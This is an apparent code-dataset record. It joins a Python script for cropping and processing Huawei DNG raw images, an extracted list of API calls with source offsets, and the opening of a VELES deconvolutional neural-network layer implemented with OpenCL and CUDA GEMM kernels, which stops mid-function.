h_offset = (h_end-h_start)//32 * 32
w_offset = (w_end-w_start)//32 * 32
rawsc=[x[h_start:h_start+h_offset,w_start:w_start+w_offset] for x in raws]
for out,raw in zip(outputs[:3],rawsc):
imwrite(out,raw)
fo = np.maximum(rawsc[2].astype(np.int32)
- rawsc[1].astype(np.int32),0).astype(np.uint16)
imwrite(outputs[3],fo)
tran = np.maximum(rawsc[1].astype(np.int32)
- rawsc[0].astype(np.int32),0).astype(np.uint16)
imwrite(outputs[4],tran)
def batch5rawc(root:str,processes=16):
df=get_trip(root)
dfi=df.applymap(lambda x:osp.join(root,'raw',x+'.dng')).to_numpy()
out_dirs=[osp.join(root,'rawc','origin'),osp.join(root,'rawc','derived')]
for d in out_dirs:
mkdir(d)
dfo=df.applymap(lambda x:osp.join(out_dirs[0],x+'.png'))
dfo[["fo","m"]]=df[["f","ab"]].applymap(
lambda x:osp.join(out_dirs[1],x+'.png'))
dfo=dfo.to_numpy()
dfbd=(pd.read_csv(osp.join(root,root+'.csv'))[["w1","h1","w2","h2"]]).to_numpy()
# get5rawc(dfi[0],dfo[0],dfbd[0])
# return
with Pool(16) as p:
ares = p.starmap_async(get5rawc, zip(dfi,dfo,dfbd))
ares.wait()
def main3():
for subdir in [ 'huawei_20200918', 'huawei_20200910', 'huawei_20200826']:
batch5rawc(subdir)
batch_rawtb(subdir)
five(subdir,'rawc')
def main():
sizes=[]
for root in [ 'huawei_20200918', 'huawei_20200910', 'huawei_20200826']:
root=osp.join(root,'rgbc','origin')
ls=os.listdir(root)
for f in ls:
sizes.append(cv.imread(osp.join(root,f)).shape)
sizes=np.array(sizes)
# np.savez('size.npz',sizes)
print(np.histogram(sizes[:,0]))
print(np.histogram(sizes[:,1]))
def main2():
for subdir in ['huawei_20200918', 'huawei_20200910', 'huawei_20200826', 'huawei_20200909', 'huawei_20200917']:
# for subdir in ['huawei_20200917']:
# batch5rgb(subdir)
# batch_crop_rgb(subdir)
# batch_rgbtb(subdir)
# five(subdir,'rgbc')
# concat_bbs(subdir)
print(subdir)
df=get_trip(subdir)
print(len(df))
if __name__ == '__main__':
main2()
# dfi=["huawei_20200917/raw/IMG_20200917_153703.dng",
# "huawei_20200917/raw/IMG_20200917_153710.dng",
# "huawei_20200917/raw/IMG_20200917_153724.dng"]
# dfo=["huawei_20200917/rgb/origin/IMG_20200917_153703.jpg",
# "huawei_20200917/rgb/origin/IMG_20200917_153710.jpg",
# "huawei_20200917/rgb/origin/IMG_20200917_153724.jpg",
# "huawei_20200917/rgb/derived/IMG_20200917_153724.jpg",
# "huawei_20200917/rgb/derived/IMG_20200917_153710.jpg"]
# get5rgb(dfi,dfo)
# a=rawpy.imread("huawei_20200917/raw/IMG_20200917_153703.dng").raw_image_visible.shape
# a=imread("huawei_20200917/raw/IMG_20200917_153703.dng").shape
# print(a)
|
[
"pprint.pformat",
"numpy.histogram",
"utils.io.imwrite",
"os.path.join",
"utils.io.raw_read_rgb",
"utils.io.imread",
"cv2.imwrite",
"utils.io.check_exif",
"utils.path.mkdir",
"rawpy.imread",
"pandas.concat",
"cv2.resize",
"utils.io.get_exif",
"multiprocessing.Pool",
"utils.io.parse_tripr",
"os.listdir",
"cv2.imread",
"numpy.array",
"utils.io.get_trip"
] |
[((1023, 1041), 'utils.io.check_exif', 'check_exif', (['inputs'], {}), '(inputs)\n', (1033, 1041), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1597, 1620), 'utils.io.imwrite', 'imwrite', (['outputs[3]', 'fo'], {}), '(outputs[3], fo)\n', (1604, 1620), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2024, 2049), 'utils.io.imwrite', 'imwrite', (['outputs[4]', 'tran'], {}), '(outputs[4], tran)\n', (2031, 2049), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2095, 2109), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (2103, 2109), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2752, 2785), 'pandas.concat', 'pd.concat', (['[dftrip, dfbd]'], {'axis': '(1)'}), '([dftrip, dfbd], axis=1)\n', (2761, 2785), True, 'import pandas as pd\n'), ((2930, 2944), 'utils.io.get_exif', 'get_exif', (['path'], {}), '(path)\n', (2938, 2944), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((3308, 3322), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (3316, 3322), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((4033, 4047), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (4041, 4047), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((4822, 4836), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (4830, 4836), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((5888, 5902), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (5896, 5902), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7166, 7189), 'utils.io.imwrite', 'imwrite', (['outputs[3]', 'fo'], {}), '(outputs[3], fo)\n', (7173, 7189), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7304, 7329), 'utils.io.imwrite', 'imwrite', (['outputs[4]', 'tran'], {}), '(outputs[4], tran)\n', (7311, 7329), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7381, 7395), 'utils.io.get_trip', 'get_trip', (['root'], {}), '(root)\n', (7389, 7395), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((8454, 8469), 'numpy.array', 'np.array', (['sizes'], {}), '(sizes)\n', (8462, 8469), True, 'import numpy as np\n'), ((807, 832), 'utils.io.parse_tripr', 'parse_tripr', (['input_folder'], {}), '(input_folder)\n', (818, 832), False, 'from utils.io import parse_tripr\n'), ((1052, 1067), 'utils.io.raw_read_rgb', 'raw_read_rgb', (['x'], {}), '(x)\n', (1064, 1067), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1160, 1177), 'utils.io.imwrite', 'imwrite', (['out', 'rgb'], {}), '(out, rgb)\n', (1167, 1177), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, 
mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((1205, 1220), 'rawpy.imread', 'rawpy.imread', (['x'], {}), '(x)\n', (1217, 1220), False, 'import rawpy\n'), ((1631, 1646), 'rawpy.imread', 'rawpy.imread', (['x'], {}), '(x)\n', (1643, 1646), False, 'import rawpy\n'), ((2195, 2226), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""origin"""'], {}), "(root, 'rgb', 'origin')\n", (2203, 2226), True, 'import os.path as osp\n'), ((2225, 2257), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""derived"""'], {}), "(root, 'rgb', 'derived')\n", (2233, 2257), True, 'import os.path as osp\n'), ((2288, 2296), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (2293, 2296), False, 'from utils.path import be, bj, mkdir\n'), ((2532, 2540), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (2536, 2540), False, 'from multiprocessing import Pool, RawArray\n'), ((2665, 2694), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (2673, 2694), True, 'import os.path as osp\n'), ((2716, 2742), 'os.path.join', 'osp.join', (['root', '"""trip.csv"""'], {}), "(root, 'trip.csv')\n", (2724, 2742), True, 'import os.path as osp\n'), ((2800, 2824), 'os.path.join', 'osp.join', (['root', '"""bb.csv"""'], {}), "(root, 'bb.csv')\n", (2808, 2824), True, 'import os.path as osp\n'), ((3102, 3114), 'cv2.imread', 'cv.imread', (['i'], {}), '(i)\n', (3111, 3114), True, 'import cv2 as cv\n'), ((3336, 3365), 'os.path.join', 'osp.join', (['root', 'fmt', '"""origin"""'], {}), "(root, fmt, 'origin')\n", (3344, 3365), True, 'import os.path as osp\n'), ((3364, 3394), 'os.path.join', 'osp.join', (['root', 'fmt', '"""derived"""'], {}), "(root, fmt, 'derived')\n", (3372, 3394), True, 'import os.path as osp\n'), ((3589, 3631), 'os.path.join', 'osp.join', (['root', 'fmt', '"""thumbnail"""', '"""origin"""'], {}), "(root, fmt, 'thumbnail', 'origin')\n", (3597, 3631), True, 'import os.path as osp\n'), ((3629, 3672), 'os.path.join', 'osp.join', (['root', 'fmt', '"""thumbnail"""', '"""derived"""'], {}), "(root, fmt, 'thumbnail', 'derived')\n", (3637, 3672), True, 'import os.path as osp\n'), ((3702, 3710), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (3707, 3710), False, 'from utils.path import be, bj, mkdir\n'), ((3903, 3911), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (3907, 3911), False, 'from multiprocessing import Pool, RawArray\n'), ((4062, 4103), 'os.path.join', 'osp.join', (['imformat', '"""thumbnail"""', '"""origin"""'], {}), "(imformat, 'thumbnail', 'origin')\n", (4070, 4103), True, 'import os.path as osp\n'), ((4102, 4144), 'os.path.join', 'osp.join', (['imformat', '"""thumbnail"""', '"""derived"""'], {}), "(imformat, 'thumbnail', 'derived')\n", (4110, 4144), True, 'import os.path as osp\n'), ((4341, 4377), 'os.path.join', 'osp.join', (['root', 'f"""five{imformat}.md"""'], {}), "(root, f'five{imformat}.md')\n", (4349, 4377), True, 'import os.path as osp\n'), ((4650, 4662), 'cv2.imread', 'cv.imread', (['i'], {}), '(i)\n', (4659, 4662), True, 'import cv2 as cv\n'), ((4719, 4793), 'cv2.imwrite', 'cv.imwrite', (['o', 'img[h_start:h_start + h_offset, w_start:w_start + w_offset]'], {}), '(o, img[h_start:h_start + h_offset, w_start:w_start + w_offset])\n', (4729, 4793), True, 'import cv2 as cv\n'), ((4850, 4881), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""origin"""'], {}), "(root, 'rgb', 'origin')\n", (4858, 4881), True, 'import os.path as osp\n'), ((4880, 4912), 'os.path.join', 'osp.join', (['root', '"""rgb"""', '"""derived"""'], {}), "(root, 'rgb', 
'derived')\n", (4888, 4912), True, 'import os.path as osp\n'), ((5107, 5139), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""origin"""'], {}), "(root, 'rgbc', 'origin')\n", (5115, 5139), True, 'import os.path as osp\n'), ((5138, 5171), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""derived"""'], {}), "(root, 'rgbc', 'derived')\n", (5146, 5171), True, 'import os.path as osp\n'), ((5202, 5210), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (5207, 5210), False, 'from utils.path import be, bj, mkdir\n'), ((5563, 5571), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (5567, 5571), False, 'from multiprocessing import Pool, RawArray\n'), ((5842, 5857), 'utils.io.imwrite', 'imwrite', (['o', 'img'], {}), '(o, img)\n', (5849, 5857), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((5916, 5948), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""origin"""'], {}), "(root, 'rawc', 'origin')\n", (5924, 5948), True, 'import os.path as osp\n'), ((5947, 5980), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""derived"""'], {}), "(root, 'rawc', 'derived')\n", (5955, 5980), True, 'import os.path as osp\n'), ((6175, 6220), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""thumbnail"""', '"""origin"""'], {}), "(root, 'rawc', 'thumbnail', 'origin')\n", (6183, 6220), True, 'import os.path as osp\n'), ((6218, 6264), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""thumbnail"""', '"""derived"""'], {}), "(root, 'rawc', 'thumbnail', 'derived')\n", (6226, 6264), True, 'import os.path as osp\n'), ((6294, 6302), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (6299, 6302), False, 'from utils.path import be, bj, mkdir\n'), ((6495, 6503), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (6499, 6503), False, 'from multiprocessing import Pool, RawArray\n'), ((6694, 6703), 'utils.io.imread', 'imread', (['x'], {}), '(x)\n', (6700, 6703), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7037, 7054), 'utils.io.imwrite', 'imwrite', (['out', 'raw'], {}), '(out, raw)\n', (7044, 7054), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((7481, 7513), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""origin"""'], {}), "(root, 'rawc', 'origin')\n", (7489, 7513), True, 'import os.path as osp\n'), ((7512, 7545), 'os.path.join', 'osp.join', (['root', '"""rawc"""', '"""derived"""'], {}), "(root, 'rawc', 'derived')\n", (7520, 7545), True, 'import os.path as osp\n'), ((7576, 7584), 'utils.path.mkdir', 'mkdir', (['d'], {}), '(d)\n', (7581, 7584), False, 'from utils.path import be, bj, mkdir\n'), ((7913, 7921), 'multiprocessing.Pool', 'Pool', (['(16)'], {}), '(16)\n', (7917, 7921), False, 'from multiprocessing import Pool, RawArray\n'), ((8304, 8336), 'os.path.join', 'osp.join', (['root', '"""rgbc"""', '"""origin"""'], {}), "(root, 'rgbc', 'origin')\n", (8312, 8336), True, 'import os.path as osp\n'), ((8346, 8362), 'os.listdir', 'os.listdir', (['root'], {}), '(root)\n', (8356, 8362), False, 'import os\n'), ((8513, 8538), 'numpy.histogram', 'np.histogram', (['sizes[:, 0]'], {}), '(sizes[:, 0])\n', (8525, 8538), True, 'import numpy as np\n'), ((8549, 8574), 'numpy.histogram', 'np.histogram', (['sizes[:, 1]'], {}), '(sizes[:, 1])\n', (8561, 8574), True, 'import numpy as np\n'), ((8929, 8945), 'utils.io.get_trip', 'get_trip', 
(['subdir'], {}), '(subdir)\n', (8937, 8945), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((851, 885), 'os.path.join', 'osp.join', (['input_folder', '"""trip.csv"""'], {}), "(input_folder, 'trip.csv')\n", (859, 885), True, 'import os.path as osp\n'), ((2326, 2359), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (2334, 2359), True, 'import os.path as osp\n'), ((2424, 2457), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (2432, 2457), True, 'import os.path as osp\n'), ((2999, 3009), 'pprint.pformat', 'pformat', (['a'], {}), '(a)\n', (3006, 3009), False, 'from pprint import pformat\n'), ((3236, 3267), 'cv2.resize', 'cv.resize', (['im', 'None'], {'fx': 'r', 'fy': 'r'}), '(im, None, fx=r, fy=r)\n', (3245, 3267), True, 'import cv2 as cv\n'), ((3423, 3455), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.jpg')"], {}), "(in_dirs[0], x + '.jpg')\n", (3431, 3455), True, 'import os.path as osp\n'), ((3520, 3552), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.jpg')"], {}), "(in_dirs[1], x + '.jpg')\n", (3528, 3552), True, 'import os.path as osp\n'), ((3740, 3773), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (3748, 3773), True, 'import os.path as osp\n'), ((3838, 3871), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (3846, 3871), True, 'import os.path as osp\n'), ((4941, 4973), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.jpg')"], {}), "(in_dirs[0], x + '.jpg')\n", (4949, 4973), True, 'import os.path as osp\n'), ((5038, 5070), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.jpg')"], {}), "(in_dirs[1], x + '.jpg')\n", (5046, 5070), True, 'import os.path as osp\n'), ((5240, 5273), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (5248, 5273), True, 'import os.path as osp\n'), ((5338, 5371), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (5346, 5371), True, 'import os.path as osp\n'), ((6009, 6041), 'os.path.join', 'osp.join', (['in_dirs[0]', "(x + '.png')"], {}), "(in_dirs[0], x + '.png')\n", (6017, 6041), True, 'import os.path as osp\n'), ((6106, 6138), 'os.path.join', 'osp.join', (['in_dirs[1]', "(x + '.png')"], {}), "(in_dirs[1], x + '.png')\n", (6114, 6138), True, 'import os.path as osp\n'), ((6332, 6365), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (6340, 6365), True, 'import os.path as osp\n'), ((6430, 6463), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (6438, 6463), True, 'import os.path as osp\n'), ((7614, 7647), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.png')"], {}), "(out_dirs[0], x + '.png')\n", (7622, 7647), True, 'import os.path as osp\n'), ((7712, 7745), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.png')"], {}), "(out_dirs[1], x + '.png')\n", (7720, 7745), True, 'import os.path as osp\n'), ((5732, 5741), 'utils.io.imread', 'imread', (['x'], {}), '(x)\n', (5738, 5741), False, 'from utils.io import imread, imwrite, get_exif, get_trip, raw2rgbg, mdwrite, raw_read_rgb, check_exif, extract_exif\n'), ((2139, 2172), 'os.path.join', 'osp.join', (['root', '"""raw"""', "(x + '.dng')"], {}), "(root, 'raw', x + '.dng')\n", (2147, 2172), True, 'import os.path as osp\n'), 
((4183, 4216), 'os.path.join', 'osp.join', (['out_dirs[0]', "(x + '.jpg')"], {}), "(out_dirs[0], x + '.jpg')\n", (4191, 4216), True, 'import os.path as osp\n'), ((4294, 4327), 'os.path.join', 'osp.join', (['out_dirs[1]', "(x + '.jpg')"], {}), "(out_dirs[1], x + '.jpg')\n", (4302, 4327), True, 'import os.path as osp\n'), ((5416, 5445), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (5424, 5445), True, 'import os.path as osp\n'), ((7425, 7458), 'os.path.join', 'osp.join', (['root', '"""raw"""', "(x + '.dng')"], {}), "(root, 'raw', x + '.dng')\n", (7433, 7458), True, 'import os.path as osp\n'), ((7789, 7818), 'os.path.join', 'osp.join', (['root', "(root + '.csv')"], {}), "(root, root + '.csv')\n", (7797, 7818), True, 'import os.path as osp\n'), ((8419, 8436), 'os.path.join', 'osp.join', (['root', 'f'], {}), '(root, f)\n', (8427, 8436), True, 'import os.path as osp\n')]
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jul 1, 2014
Deconvolutional layer.
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
from __future__ import division
import cuda4py.blas as cublas
import numpy
from zope.interface import implementer
from veles.config import root
from veles.compat import from_none
from veles.accelerated_units import IOpenCLUnit, ICUDAUnit, INumpyUnit
from veles.memory import Array
import veles.ocl_blas as ocl_blas
from veles.znicz.conv import ConvolutionalBase
import veles.znicz.nn_units as nn_units
from veles.distributable import TriviallyDistributable
@implementer(IOpenCLUnit, ICUDAUnit, INumpyUnit)
class Deconv(TriviallyDistributable, ConvolutionalBase, nn_units.Forward):
# TriviallyDistributable overrides nn_units.Forward IDistributable
"""Deconvolutional layer for simple convolutional layer
with linear activation and without bias.
Must be assigned before initialize():
input
weights
output_shape_source
Updates after run():
output
Creates within initialize():
output
Attributes:
input: input as batch of multichannel interleaved images.
output: output as batch of multichannel interleaved images.
weights: matrix of weights.
output_shape_source: Array to get output shape from.
n_kernels: number of convolutional kernels
in the corresponding convolutional layer.
kx: kernel width.
ky: kernel height.
sliding: tuple of kernel sliding (by x-axis, by y-axis),
kx, ky MUST be a multiple of sliding to avoid irregularities.
padding: tuple of virtual sample padding (left, top, right, bottom),
will be computed automatically based on sliding.
weights_transposed: assume weights matrix as a transposed one.
unsafe_padding: flag to enable unsafe padding and/or sliding.
"""
MAPPING = {"deconv"}
@staticmethod
def compute_padding(sx, sy, kx, ky, sliding):
"""Computes required padding.
"""
return (kx - sliding[1], ky - sliding[0],
kx - sx % sliding[1] if sx % sliding[1] != 0
else kx - sliding[1],
ky - sy % sliding[0] if sy % sliding[0] != 0
else ky - sliding[0])
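        # Example: kx = ky = 4, sliding = (2, 2), sx = sy = 9
        # gives padding = (2, 2, 3, 3).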
@staticmethod
def check_padding_is_safe(kx, ky, sliding):
if sliding[0] > (ky >> 1) or sliding[1] > (kx >> 1):
raise ValueError(
"sliding should not be greater than half of the kernel size")
        if ky % sliding[0] != 0 or kx % sliding[1] != 0:
raise ValueError(
"Kernel size should be multiple of sliding")
def __init__(self, workflow, **kwargs):
super(Deconv, self).__init__(workflow, **kwargs)
self.unsafe_padding = kwargs.get("unsafe_padding", False)
self.hits = Array()
self.krn_clear_output_ = None
self._global_size = None
self._local_size = None
del self.bias
self.demand("n_kernels", "kx", "ky", "padding", "sliding",
"input", "weights", "output_shape_source")
def init_unpickled(self):
super(Deconv, self).init_unpickled()
self.sources_["deconv/forward"] = {}
def initialize(self, device, **kwargs):
super(Deconv, self).initialize(device, **kwargs)
self._dtype = self.input.dtype
self.weights_shape = (tuple(reversed(self.weights.shape))
if self.weights_transposed
else self.weights.shape)
if hasattr(self, "bias"):
raise ValueError("bias should not be set")
if (len(self.input.shape) != 4 or
self.input.shape[3] != self.n_kernels):
raise ValueError("Incorrectly shaped input encountered")
if (len(self.weights_shape) != 2 or
self.weights_shape[0] != self.n_kernels or
self.weights_shape[1] % (self.kx * self.ky) != 0):
raise ValueError("Incorrectly shaped weights encountered")
output_shape = tuple(self.output_shape_source.shape)
if len(output_shape) != 4:
raise ValueError("Incorrect output_shape_source shape")
if output_shape[0] != self.input.shape[0]:
raise ValueError(
"output_shape_source.shape[0] != input.shape[0]")
try:
self.check_padding_is_safe(self.kx, self.ky, self.sliding)
except ValueError as e:
if not self.unsafe_padding:
raise from_none(e)
self.warning("The padding will be unsafe")
self._create_hits(output_shape)
padding = Deconv.compute_padding(
output_shape[2], output_shape[1], self.kx, self.ky, self.sliding)
if self.padding is None: # pylint: disable=E0203
self.padding = padding
elif self.padding != padding:
if not self.unsafe_padding:
raise ValueError(
"Expected padding %s but got %s" % (padding, self.padding))
self._create_hits(output_shape)
if self.output:
assert self.output.shape[1:] == output_shape[1:]
if not self.output or self.output.shape[0] != output_shape[0]:
self.output.reset(numpy.zeros(output_shape,
dtype=self._dtype))
self._output_shape = output_shape
self._sy, self._sx, self._n_channels = self._output_shape[1:]
self._kernel_size = self.kx * self.ky * self._n_channels
self._kernel_app_per_image = self.input.sample_size // self.n_kernels
self._kernel_app_total = (self._kernel_app_per_image *
self.input.shape[0])
self.init_vectors(self.input, self.weights, self.output, self.hits)
def _create_hits(self, output_shape):
if not self.hits:
self.hits.reset(
numpy.zeros(output_shape, dtype=numpy.int32))
else:
assert self.hits.size == int(numpy.prod(output_shape))
def _gpu_init(self, blas_class):
defines = {
"USE_ATOMICS": 1,
"WEIGHTS_TRANSPOSED": int(self.weights_transposed),
"BATCH": self._output_shape[0],
"SX": self._sx,
"SY": self._sy,
"N_CHANNELS": self._n_channels,
"KX": self.kx,
"KY": self.ky,
"N_KERNELS": self.n_kernels,
"PAD_LEFT": self.padding[0],
"PAD_TOP": self.padding[1],
"PAD_RIGHT": self.padding[2],
"PAD_BOTTOM": self.padding[3],
"SLIDE_X": self.sliding[0],
"SLIDE_Y": self.sliding[1],
"USE_HITS": int(bool(self.hits)),
"DECONV_MODE": int(bool(self.hits)) + 1,
"OUTPUT_SIZE": self.output.size
}
self.build_program(
defines, "%s/%s_%d_%dx%dx%d_%dx%d_%d" % (
root.common.dirs.cache, self.__class__.__name__,
self.input.shape[0],
self._output_shape[2], self._output_shape[1],
self._output_shape[3],
self.kx, self.ky, self.n_kernels), dtype=self._dtype)
self.krn_pack_ = self.get_kernel("DirectPack")
unpack_bytes = (self._kernel_app_per_image * self.unpack_size *
self._kernel_size * self.input.itemsize)
self.device.request_temp_buffer(unpack_bytes)
if self.hits:
self.krn_pack_.set_arg(3, self.hits.devmem)
self.krn_apply_hits_ = self.get_kernel("apply_hits")
self.krn_apply_hits_.set_args(self.output.devmem, self.hits.devmem)
self.gemm_ = blas_class.gemm(self._dtype)
self.np_one = numpy.ones(1, dtype=self._dtype)
self.np_zero = numpy.zeros(1, dtype=self._dtype)
self._const_i = numpy.zeros(1, dtype=numpy.int64)
def ocl_init(self):
ocl_blas.OCLBLAS.attach_to_device(self.device)
self._gpu_init(ocl_blas.OCLBLAS)
self._global_size_pack = lambda size: (size,)
self._local_size_pack = None
if self.hits:
self.krn_clear_hits_ = self.get_kernel("clear_hits")
self.krn_clear_hits_.set_arg(0, self.hits.devmem)
self._global_size_hits = (self.output.size,)
self._local_size_hits = None
self.krn_clear_output_ = self.get_kernel("clear_output")
self.krn_clear_output_.set_arg(0, self.output.devmem)
self._clear_output = lambda: (
self.execute_kernel((self.output.size,), None,
self.krn_clear_output_))
self._clear_hits = lambda: (
self.execute_kernel((self.hits.size,), None, self.krn_clear_hits_))
self._process_subblock = self._ocl_process_subblock
self.krn_pack_.set_arg(1, self.output.devmem)
def cuda_init(self):
self._gpu_init(cublas.CUBLAS)
block_size = self.device.suggest_block_size(self.krn_pack_)
self._global_size_pack = (
lambda size: (int(numpy.ceil(size / block_size)), 1, 1))
self._local_size_pack = (block_size, 1, 1)
if self.hits:
block_size = self.device.suggest_block_size(self.krn_apply_hits_)
self._global_size_hits = (
int(numpy.ceil(self.output.size / block_size)), 1, 1)
self._local_size_hits = (block_size, 1, 1)
self._clear_output = lambda: self.output.devmem.memset32_async()
self._clear_hits = lambda: self.hits.devmem.memset32_async()
self._process_subblock = self._cuda_process_subblock
def ocl_run(self):
self.gpu_run()
def cuda_run(self):
self.gpu_run()
def gpu_run(self):
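        # Flow: clear the output (and the hit counts when unsafe padding is
        # enabled), then for each sub-batch of up to unpack_size images run a
        # GEMM that multiplies the weights into the input activations to
        # reconstruct the unpacked kernel patches, followed by the DirectPack
        # kernel that scatter-adds those patches into the output image; if
        # hits are tracked, apply_hits then adjusts the output using the
        # per-pixel hit counts.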
self.unmap_vectors(self.output, self.input, self.weights)
unpack_data = self.device.get_temp_buffer()
self._clear_output()
if self.hits:
self.hits.unmap()
self._clear_hits()
batch_size = self.output.shape[0]
for i in range(0, batch_size, self.unpack_size):
self._process_subblock(i, min(batch_size - i, self.unpack_size),
unpack_data)
if self.hits:
self.execute_kernel(self._global_size_hits, self._local_size_hits,
self.krn_apply_hits_)
def _cuda_process_subblock(self, start_image, image_count, unpack_data):
output_offs = (start_image * self.input.sample_size *
self.input.itemsize)
unpack_side = self._kernel_app_per_image * image_count
self.gemm_(
self.device.blas, cublas.CUBLAS_OP_T if self.weights_transposed
else cublas.CUBLAS_OP_N, cublas.CUBLAS_OP_N,
self._kernel_size, unpack_side, self.weights_shape[0],
self.np_one, self.weights.devmem,
int(self.input.devmem) + output_offs,
self.np_zero, unpack_data)
self.krn_pack_.set_arg(0, unpack_data)
self.krn_pack_.set_arg(
1, int(self.output.devmem) +
start_image * self.output.sample_size * self.output.itemsize)
limit = unpack_side * self._kernel_size
self._const_i[0] = limit
self.krn_pack_.set_arg(2, self._const_i)
self.execute_kernel(self._global_size_pack(limit),
self._local_size_pack, self.krn_pack_)
def _ocl_process_subblock(self, start_image, image_count, unpack_data):
output_offs = start_image * self.input.sample_size
unpack_side = self._kernel_app_per_image * image_count
self.gemm_(
self.device.blas, cublas.CUBLAS_OP_T if self.weights_transposed
else cublas.CUBLAS_OP_N, cublas.CUBLAS_OP_N,
self._kernel_size, unpack_side, self.weights_shape[0],
self.np_one, self.weights.devmem,
self.input.devmem,
